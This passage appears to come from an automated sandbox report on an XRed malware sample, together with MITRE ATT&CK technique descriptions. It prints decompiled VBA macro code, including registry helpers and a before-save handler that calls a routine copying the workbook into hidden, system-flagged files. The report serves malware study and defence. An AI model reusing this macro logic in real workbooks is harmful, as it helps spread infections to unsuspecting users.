121	Set myWS = CreateObject("WScript.Shell")	CreateObject
122	RegKeyRead = myWS.RegRead(i_RegKey)	RegRead
123	End Function

Subroutine
RegKeySaveAPIs: 2, Strings: 1, Number of lines: 5, Relevance: 7.005

APIs	Meta Information
CreateObject
RegWrite

Strings	Decrypted Strings
"WScript.Shell"

Line	Instruction	Meta Information
138	Sub RegKeySave(i_RegKey as String, i_Value as String, optional i_Type as String = "REG_SZ")
141	Dim myWS as Object
143	Set myWS = CreateObject("WScript.Shell")	CreateObject
144	myWS.RegWrite i_RegKey, i_Value, i_Type	RegWrite
145	End Sub

Subroutine
Workbook_BeforeCloseAPIs: 1, Strings: 0, Number of lines: 5, Relevance: 3.005

APIs	Meta Information
Saved

Line	Instruction	Meta Information
30	Private Sub Workbook_BeforeClose(Cancel as Boolean)
31	If Not SheetsChanged Then
32	ActiveWorkbook.Saved = True	Saved
33	Endif
34	End Sub

Subroutine
Workbook_BeforeSaveAPIs: 36, Strings: 1, Number of lines: 41, Relevance: 55.541

APIs	Meta Information
ActiveSheet
EnableEvents
ScreenUpdating
Sheets
Sheets
xlSheetHidden
Save
Sheets
Sheets
xlSheetVisible
Select
ScreenUpdating
EnableEvents
EnableEvents
ScreenUpdating
Sheets
Sheets
xlSheetHidden
GetSaveAsFilename
SaveAs
xlOpenXMLWorkbookMacroEnabled
Part of subcall function SaveAsInj@ThisWorkbook: CreateObject
Part of subcall function SaveAsInj@ThisWorkbook: Environ
Part of subcall function SaveAsInj@ThisWorkbook: FileExists
Part of subcall function SaveAsInj@ThisWorkbook: FileExists
Part of subcall function SaveAsInj@ThisWorkbook: FileCopy
Part of subcall function SaveAsInj@ThisWorkbook: SetAttr
Part of subcall function SaveAsInj@ThisWorkbook: vbHidden
Part of subcall function SaveAsInj@ThisWorkbook: vbSystem
Path
Sheets
Sheets
xlSheetVisible
Select
ScreenUpdating
EnableEvents

Strings	Decrypted Strings
"Excel \xc7al\x0131\x015fma Kitab\x0131 (.xlsm), .xlsm"

Line	Instruction	Meta Information
51	Private Sub Workbook_BeforeSave(ByVal SaveAsUI as Boolean, Cancel as Boolean)
52	Dim i as Integer
53	Dim AIndex as Integer
54	Dim FName
56	AIndex = ActiveWorkbook.ActiveSheet.Index	ActiveSheet
58	If SaveAsUI = False Then
59	Cancel = True
60	Application.EnableEvents = False	EnableEvents
61	Application.ScreenUpdating = False	ScreenUpdating
63	For i = 1 To ActiveWorkbook.Sheets.Count - 1	Sheets
64	ActiveWorkbook.Sheets(i).Visible = xlSheetHidden	Sheets xlSheetHidden
65	Next i	Sheets
66	ActiveWorkbook.Save	Save
68	For i = 1 To ActiveWorkbook.Sheets.Count	Sheets
69	ActiveWorkbook.Sheets(i).Visible = xlSheetVisible	Sheets xlSheetVisible
70	Next i	Sheets
71	ActiveWorkbook.Sheets(AIndex).Select	Select
72	SheetsChanged = False
74	Application.ScreenUpdating = True	ScreenUpdating
75	Application.EnableEvents = True	EnableEvents
76	Else
77	Cancel = True
78	Application.EnableEvents = False	EnableEvents
79	Application.ScreenUpdating = False	ScreenUpdating
81	For i = 1 To ActiveWorkbook.Sheets.Count - 1	Sheets
82	ActiveWorkbook.Sheets(i).Visible = xlSheetHidden	Sheets xlSheetHidden
83	Next i	Sheets
85	FName = Application.GetSaveAsFilename(fileFilter := "Excel \xc7al\x0131\x015fma Kitab\x0131 (.xlsm), .xlsm")	GetSaveAsFilename
86	If FName <> False Then
87	ActiveWorkbook.SaveAs Filename := FName, FileFormat := xlOpenXMLWorkbookMacroEnabled	SaveAs xlOpenXMLWorkbookMacroEnabled
88	SaveAsInj ActiveWorkbook.Path	Path
89	Endif
91	For i = 1 To ActiveWorkbook.Sheets.Count	Sheets
92	ActiveWorkbook.Sheets(i).Visible = xlSheetVisible	Sheets xlSheetVisible
93	Next i	Sheets
94	ActiveWorkbook.Sheets(AIndex).Select	Select
95	SheetsChanged = False
97	Application.ScreenUpdating = True	ScreenUpdating
98	Application.EnableEvents = True	EnableEvents
99	Endif
100	End Sub

Subroutine
Workbook_SheetActivateAPIs: 4, Strings: 0, Number of lines: 6, Relevance: 5.006

APIs	Meta Information
Sheets
ActiveWorkbook
Sheets
ActiveWorkbook

Line	Instruction	Meta Information
44	Private Sub Workbook_SheetActivate(ByVal Sh as Object)
45	If ActiveWorkbook.Sheets.Count <> SheetCount Then	Sheets ActiveWorkbook
46	SheetsChanged = True
47	SheetCount = ActiveWorkbook.Sheets.Count	Sheets ActiveWorkbook
48	Endif
49	End Sub

Subroutine
Workbook_SheetChangeAPIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
36	Private Sub Workbook_SheetChange(ByVal Sh as Object, ByVal Target as Range)
37	SheetsChanged = True
38	End Sub

Subroutine
Workbook_NewSheetAPIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
40	Private Sub Workbook_NewSheet(ByVal Sh as Object)
41	SheetsChanged = True
42	End Sub

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report docx.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: XRed

Yara Signatures

Initial Sample

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Malware Analysis System Evasion

Anti Debugging

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

DNS Answers

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: msiexec.exePID: 2184, Parent PID: 724

General

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Graph

Module: Sayfa1

Declaration

Module: ThisWorkbook

Declaration

Non-Executed Functions

SubroutineMPSAPIs: 83, Strings: 9, Number of lines: 38, Relevance: 162.788

SubroutineWorkbook_OpenAPIs: 45, Strings: 4, Number of lines: 13, Relevance: 87.513

FunctionFDWAPIs: 17, Strings: 14, Number of lines: 25, Relevance: 56.025

Windows Analysis Report
docx.msi

Subroutine
MPSAPIs: 83, Strings: 9, Number of lines: 38, Relevance: 162.788

Subroutine
Workbook_OpenAPIs: 45, Strings: 4, Number of lines: 13, Relevance: 87.513

Function
FDWAPIs: 17, Strings: 14, Number of lines: 25, Relevance: 56.025

Subroutine
SaveAsInjAPIs: 8, Strings: 2, Number of lines: 12, Relevance: 19.262

Function
RegKeyExistsAPIs: 2, Strings: 1, Number of lines: 10, Relevance: 7.01

Function
RegKeyReadAPIs: 2, Strings: 1, Number of lines: 6, Relevance: 7.006

Subroutine
RegKeySaveAPIs: 2, Strings: 1, Number of lines: 5, Relevance: 7.005

Subroutine
Workbook_BeforeCloseAPIs: 1, Strings: 0, Number of lines: 5, Relevance: 3.005

Subroutine
Workbook_BeforeSaveAPIs: 36, Strings: 1, Number of lines: 41, Relevance: 55.541

Subroutine
Workbook_SheetActivateAPIs: 4, Strings: 0, Number of lines: 6, Relevance: 5.006

Subroutine
Workbook_SheetChangeAPIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Subroutine
Workbook_NewSheetAPIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003